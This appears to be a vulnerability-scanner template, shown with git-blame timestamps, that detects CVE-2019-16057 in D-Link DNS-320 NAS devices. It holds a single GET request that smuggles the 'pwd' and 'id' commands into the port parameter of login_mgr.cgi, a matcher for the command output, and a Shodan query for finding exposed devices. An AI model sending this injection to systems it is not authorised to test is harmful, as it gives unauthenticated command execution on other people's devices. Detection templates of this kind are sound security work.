2023-08-04 06:20:51 +00:00
|
|
|
id: CVE-2019-16057
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: D-Link DNS-320 - Remote Code Execution
|
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
|
2023-08-04 06:20:51 +00:00
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16057
|
|
|
|
- https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png
|
|
|
|
- https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
|
|
|
|
- https://github.com/Z0fhack/Goby_POC
|
2023-08-04 06:20:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2019-16057
|
|
|
|
cwe-id: CWE-78
|
2024-04-08 11:34:33 +00:00
|
|
|
epss-score: 0.9754
|
|
|
|
epss-percentile: 0.99994
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
|
2023-08-04 06:20:51 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-09-06 12:53:28 +00:00
|
|
|
max-request: 1
|
2023-08-31 11:46:18 +00:00
|
|
|
vendor: dlink
|
|
|
|
product: dns-320_firmware
|
2023-09-06 12:53:28 +00:00
|
|
|
shodan-query: html:"ShareCenter"
|
2023-08-04 06:20:51 +00:00
|
|
|
tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- status_code == 200
|
2023-08-05 05:49:00 +00:00
|
|
|
- contains_all(body, "uid=", "gid=", "pwd&id")
|
2023-08-04 06:20:51 +00:00
|
|
|
condition: and
|
2024-03-25 11:57:16 +00:00
|
|
|
# digest: 4a0a0047304502201d92a0801c2f43788aed32ed75ef458b62aca7e252963f4eb1fcc936afa07554022100df7afc1ba5725bcfdeb382cf89b08067d8bd2758da7a241b7e2de0eb9c038da6:922c64590222798bb761d5b6d8e72950
|